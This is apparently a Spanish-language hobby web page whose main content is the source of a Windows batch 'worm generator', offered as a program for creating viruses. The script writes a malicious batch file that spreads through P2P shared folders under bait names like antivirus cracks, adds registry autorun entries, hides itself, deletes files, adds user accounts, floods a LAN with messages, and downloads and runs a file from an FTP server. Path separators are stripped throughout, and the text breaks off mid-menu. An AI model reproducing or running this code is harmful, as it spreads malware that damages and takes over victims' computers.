bienvenido a mu-galaxy
 
  inicio
  Contacto
  Libro de visitantes
  mi correo
  juegos
  video
  GunzInternational_20070123
  VENEZUELA
  videos grasiosos
  registrase
  conetcion
  fotos
  dragon ball online
  reproductor
  ganar dinero rapido y fasil
  mi gusano
  mi gusano 2
  mi gusano 3
  sisis
  my ultimo gusano
  para que creen su propio virus
  programa para crear virus
  Tfgfdgpágina
  msn
  Tfd
  Título de la nueva página
programa para crear virus
@echo off
title personalCAKE basado en Generador de Worms 3sk0r8ut0 MEJOREN Y MODIFIQUEN ESTE PROGRAMA
color b
set ww=0
cls
echo Version modificada por Blu3 l0llip0p
pause > nul
cls
echo El uso de este programa recae exclusivamente en el usuario.
pause > nul
cls
echo Selecciona el Nombre del pastel:
set /p name=
echo @echo off > C:%name%.bat
cls
echo Worm Creado en C: con el nombre: %name%.bat
pause > nul
:main
cls
echo Selecciona la opcion:
echo 1.  Propagacion por P2P
echo 2.  Mensage al iniciarse
echo 3.  Agregarse al Registro
echo 4.  Infectar archivos .rar
echo 5.  Borrar archivos
echo 6.  Manipular red LAN
echo 7.  Añadir Usuario y Pass
echo 8.  Copiarse y Ocultarse
echo 9.  Descargar archivo en la victima
echo 10. Crear muchas carpetas en el HD de la victima
echo 11. Apagar el PC de la victima en x segundos
echo 12. Reiniciar el PC de la victima en x segundos
echo 13. Incluir codigo de virus
echo 14. Bloquear Crtl+Alt+Sup
echo 15. Borrar AV
echo 16. Informacion adicional
echo 17. Salir
set /p opc=
if %opc%==1 goto p2p
if %opc%==2 goto sms
if %opc%==3 goto reg
if %opc%==4 goto infect
if %opc%==5 goto borra
if %opc%==6 goto manilan
if %opc%==7 goto user
if %opc%==8 goto stealth
if %opc%==9 goto down
if %opc%==10 goto mol
if %opc%==11 goto apag
if %opc%==12 goto rein
if %opc%==13 goto vir
if %opc%==14 goto bloq
if %opc%==15 goto borrr
if %opc%==16 goto info
if %opc%==17 goto fin
:p2p
echo start winrar.exe a %windir%System32windir.rar %%%ww% >> C:%name%.bat
echo if exist "%systemdrive%My Shared Folder" (GOTO MSF) else GOTO Cont1 >> C:%name%.bat
echo :MSF >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %systemdrive%My Shared FolderNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %systemdrive%My Shared FolderNorton*.rar Full+Crack.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %systemdrive%My Shared FolderTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %systemdrive%My Shared FolderRing*.rar >> C:%name%.bat
echo :Cont1 >> C:%name%.bat
echo if exist "%programfiles%KazaaMy Shared Folder" (GOTO Kazaa) else GOTO Cont2 >> C:%name%.bat
echo :Kazaa >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KazaaMy Shared FolderNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KazaaMy Shared FolderNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KazaaMy Shared FolderTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KazaaMy Shared FolderRing*.rar >> C:%name%.bat
echo :Cont2 >> C:%name%.bat
echo if exist "%programfiles%Kazaa LiteMy Shared Folder" (GOTO Kazaa2) else GOTO Cont3 >> C:%name%.bat
echo :Kazaa2 >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Kazaa LiteMy Shared FolderNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Kazaa LiteMy Shared FolderNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Kazaa LiteMy Shared FolderTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Kazaa LiteMy Shared FolderRing*.rar >> C:%name%.bat
echo :Cont3 >> C:%name%.bat
echo if exist "%programfiles%GroksterMy Grokster" (GOTO Groks) else GOTO Cont4 >> C:%name%.bat
echo :Groks >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GroksterMy GroksterNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GroksterMy GroksterNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GroksterMy GroksterTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GroksterMy GroksterRing*.rar >> C:%name%.bat
echo :Cont4 >> C:%name%.bat
echo if exist "%programfiles%MorpheusMy Shared Folder" (GOTO Morph) else GOTO Cont5 >> C:%name%.bat
echo :Morph >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%MorpheusMy Shared FolderNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%MorpheusMy Shared FolderNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%MorpheusMy Shared FolderTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%MorpheusMy Shared FolderRing*.rar >> C:%name%.bat
echo :Cont5 >> C:%name%.bat
echo if exist "%programfiles%EDONKEY2000incoming" (GOTO Edon) else GOTO Cont6 >> C:%name%.bat
echo :Edon >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%EDONKEY2000incomingNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%EDONKEY2000incomingNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%EDONKEY2000incomingTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%EDONKEY2000incomingRing*.rar >> C:%name%.bat
echo :Cont6 >> C:%name%.bat
echo if exist "%programfiles%GnucleusDownloads" (GOTO Gnuc) else GOTO Cont7 >> C:%name%.bat
echo :Gnuc >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GnucleusDownloadsNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GnucleusDownloadsNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GnucleusDownloadsTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%GnucleusDownloadsRing*.rar >> C:%name%.bat
echo :Cont7 >> C:%name%.bat
echo if exist "%programfiles%eMuleIncoming" (GOTO Emule) else GOTO Cont8 >> C:%name%.bat
echo :Emule >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%eMuleIncomingNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%eMuleIncomingNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%eMuleIncomingTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%eMuleIncomingRing*.rar >> C:%name%.bat
echo :Cont8 >> C:%name%.bat
echo if exist "%programfiles%BearShareShared" (GOTO Bear) else GOTO Cont9 >> C:%name%.bat
echo :Bear >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%BearShareSharedNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%BearShareSharedNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%BearShareSharedTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%BearShareSharedRing*.rar >> C:%name%.bat
echo :Cont9 >> C:%name%.bat
echo if exist "%programfiles%ShareazaDownloads" (GOTO Shar) else GOTO Cont10 >> C:%name%.bat
echo :Shar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ShareazaDownloadsNod32*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ShareazaDownloadsNorton*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ShareazaDownloadsTarjetas*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ShareazaDownloadsRingt*.rar >> C:%name%.bat
echo :Cont10 >> C:%name%.bat
echo if exist "%programfiles%ICQshared files" (Goto ICQ) else Goto Cont11 >> C:%name%.bat
echo :ICQ >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%ICQshared filesSub7*.rar >> C:%name%.bat
echo :Cont11 >> C:%name%.bat
echo if exist "%programfiles%Filetopia3Files" (Goto Fileto) else Goto Cont12 >> C:%name%.bat
echo :Fileto >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Filetopia3FilesSub7*.rar >> C:%name%.bat
echo :Cont12 >> C:%name%.bat
echo if exist "%programfiles%appleJuiceincoming" (Goto manzana) else Goto Cont13 >> C:%name%.bat
echo :manzana >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%appleJuiceincomingSub7*.rar >> C:%name%.bat
echo :Cont13 >> C:%name%.bat
echo if exist "%programfiles%LimeWireShared" (Goto limon) else Goto Cont14 >> C:%name%.bat
echo :limon >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%LimeWireSharedSub7*.rar >> C:%name%.bat
echo :Cont14 >> C:%name%.bat
echo if exist "%programfiles%Overnetincoming" (Goto over) else Goto Cont15 >> C:%name%.bat
echo ver >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%OvernetincomingSub7*.rar >> C:%name%.bat
echo :Cont15 >> C:%name%.bat
echo if exist "%programfiles%SwaptorDownload" (Goto swap) else Goto Cont16 >> C:%name%.bat
echo :swap >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadTroyano en .txt interavtivo.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%SwaptorDownloadSub7*.rar >> C:%name%.bat
echo :Cont16 >> C:%name%.bat
echo if exist "%programfiles%WinMXMy Shared Folder" (Goto winmx) else Goto Cont17 >> C:%name%.bat
echo :winmx >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%WinMXMy Shared FolderTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont17 >> C:%name%.bat
echo if exist "%programfiles%TeslaFiles" Goto (telsa) else Goto Cont18 >> C:%name%.bat
echo :telsa >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%TeslaFilesTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont18 >> C:%name%.bat
echo if exist "%programfiles%XoloXDownloads" (Goto xolox) else Goto Cont19 >> C:%name%.bat
echo :xolox >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%XoloXDownloadsTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont19 >> C:%name%.bat
echo if exist "%programfiles%RapigatorShare" (Goto rapiga) else Goto Cont20 >> C:%name%.bat
echo :rapiga >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%RapigatorShareTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont20 >> C:%name%.bat
echo if exist "%programfiles%KMDMy Shared Folder" (Goto kmd) else Goto Cont21 >> C:%name%.bat
echo :kmd >> C:%name%.bat
echo :rapiga >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%KMDMy Shared FolderTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont21 >> C:%name%.bat
echo if exist "%programfiles%Direct ConnectReceived Files" (Goto directcon) else Goto 22 >> C:%name%.bat
echo :directcon >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesVisual Basic*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesVisual Serial.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesCrack Winrar.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesSub7*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesCrack*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesManual*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesMsn*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesJhon the Riper*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesNo-IP DUC.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesEscondeTroyanos*.rar >> C:%name%.bat
echo copy /Y %windir%System32windir.rar %programfiles%Direct ConnectReceived FilesTroyano en .txt interavtivo.rar >> C:%name%.bat
echo :Cont22 >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:down
cls
echo Introduce el Nombre de login de tu FTP:
set /p ftpnom=
echo Introduce tu Pass:
set /p ftpas=
echo Introduce la direccion del FTP:
set /p ftpftp=
echo Introduce el nombre del Archivo:
set /p ftpfile=
echo Introduce la ruta en donde guardarlo:
set /p ftpruta=
cls
echo Selecciona:
echo 1. Ejecutarse al descargarse
echo 2. No ejecutarse
set /p ftpoption=
If %ftpoption%==1 goto down1
if %ftpoption%==2 goto down2
cls
echo ok, pastel editado
pause > nul
goto main
:down1
echo echo %ftpnom% ^> C:datos.txt >> C:%name%.bat
echo echo %ftpas% ^>^> C:datos.txt >> C:%name%.bat
echo echo put C:datos.txt datos.txt ^>^> C:datos.txt >> C:%name%.bat
echo echo binary ^>^> C:datos.txt >> C:%name%.bat
echo echo get %ftpfile% %ftpruta%%ftpfile% ^>^> C:datos.txt >> C:%name%.bat
echo echo delete datos.txt ^>^> C:datos.txt >> C:%name%.bat
echo echo bye ^>^> C:datos.txt >> C:%name%.bat
echo ftp -s:C:datos.txt %ftpftp% >> C:%name%.bat
echo del /s /q C:datos.txt >> C:%name%.bat
echo start %ftpruta%%ftpfile% >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:sms
cls
echo Escribe el mensage que se mostrara al abrir el archivo:
set /p sems=
echo msg * %sems% >> C:%name%.bat
cls
echo OK, pastel editado.
pause >nul
goto main
:reg
cls
echo Escoge el nombre con que agregarse:
set /p regom=
echo reg add "HKLMSoftwareMicrosoftWindowsCurrentVersion" /v %regom% /d %%%ww% >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:borra
cls
echo Introduce la ruta y el nombre de archivo a borrar:
set /p borrun=
echo del /s /q %borrun% >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:manilan
cls
echo Selecciona:
echo 1. Mensage a todos los usuarios 1 vez
echo 2. Mensage al usuario una vez
echo 3. DoS a la red Lan
set /p lanopt=
cls
echo Introduce el mensage:
set /p lansms=
if %lanopt%==1 goto lan1
if %lanopt%==2 goto lan2
if %lanopt%==3 goto lan3
:lan1
echo net send * %lansms% >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:lan2
echo net send %username% %lansms% >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:lan3
echo :bukle >> C:%name%.bat
echo net send * %lansms% >> C:%name%.bat
echo goto bukle >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:infect
cls
echo Introduce la ruta en la cula se infectara:
set /p infectru=
echo Introduce el nombre del archivo a infectar (con extension incluida):
set /p infnom=
echo start winrar.exe a %infectru%%infnom% %%%ww% >> C:%name%.bat
echo Copy /y %infectru%System.rar, %infectru%Windows.rar >> C:%name%.bat
echo Copy /y %infectru%System.rar, %infectru%Win32.rar >> C:%name%.bat
echo Copy /y %infectru%System.rar, %infectru%Firewall.rar >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:user
cls
echo Introduce el nombre del usuario:
set/p usernom=
echo Introduce la pass:
set /p userpass=
echo net user %usernom% %userpass% /add >> C:%name%.bat
cls
echo echo Ok, pastel editado.
pause > nul
goto main
:stealth
echo Copy /y %%%ww%, "C:WindowsSystem32Win.bat" >> C:%name%.bat
echo attrib +H +S C:WindowsSystem32Win.bat >> C:%name%.bat
echo reg add "HKLMSoftwareMicrosoftWindowsCurrentVersion" /v Win32.dll /d "C:WindowsSystem32Win.bat" >> C:%name%.bat
cls
echo Ok, pastel editado.
pause > nul
goto main
:mol
cls
echo mkdir "C:Blu3 l0llip0p" >> C:%name%.bat
echo mkdir "C:Blu3_l0llip0p" >> C:%name%.bat
echo mkdir "C:Blu3_ l0llip0p" >> C:%name%.bat
echo mkdir "C:antioto" >> C:%name%.bat
echo mkdir "C:vacuna" >> C:%name%.bat
echo mkdir "C:hacker" >> C:%name%.bat
echo mkdir "C:Guindows" >> C:%name%.bat
echo mkdir "C:System69" >> C:%name%.bat
echo mkdir "C:antidopin" >> C:%name%.bat
echo mkdir "C:discos" >> C:%name%.bat
echo mkdir "C:galiza" >> C:%name%.bat
echo mkdir "C:lammer" >> C:%name%.bat
echo mkdir "C:medico" >> C:%name%.bat
echo mkdir "C:borrame" >> C:%name%.bat
echo mkdir "C:jejjejeje" >> C:%name%.bat
echo mkdir "C:jajajaja" >> C:%name%.bat
echo mkdir "C:busca" >> C:%name%.bat
echo mkdir "C:grrrrrnnn" >> C:%name%.bat
echo mkdir "c:hola" >> C:%name%.bat
echo mkdir "c:miraaqui" >> C:%name%.bat
echo mkdir "c:reiniciar" >> C:%name%.bat
echo mkdir "c:adi0s" >> C:%name%.bat
echo mkdir "c:adios" >> C:%name%.bat
echo mkdir "C:windowsborrame1" >> C:%name%.bat
echo mkdir "C:windowsborrame2" >> C:%name%.bat
echo mkdir "C:windowsborrame3" >> C:%name%.bat
echo mkdir "C:windowsborrame4" >> C:%name%.bat
echo mkdir "C:windowsborrame5" >> C:%name%.bat
echo mkdir "C:windowsborrame6" >> C:%name%.bat
echo mkdir "C:windowsborrame7" >> C:%name%.bat
echo mkdir "C:windowsborrame8" >> C:%name%.bat
echo mkdir "C:windowsborrame9" >> C:%name%.bat
echo mkdir "C:windowsborrame0" >> C:%name%.bat
echo mkdir "C:windowsborrame11" >> C:%name%.bat
echo mkdir "C:windowshack1" >> C:%name%.bat
echo mkdir "C:windowshack2" >> C:%name%.bat
echo mkdir "C:windowshack3" >> C:%name%.bat
echo mkdir "C:windowshack4" >> C:%name%.bat
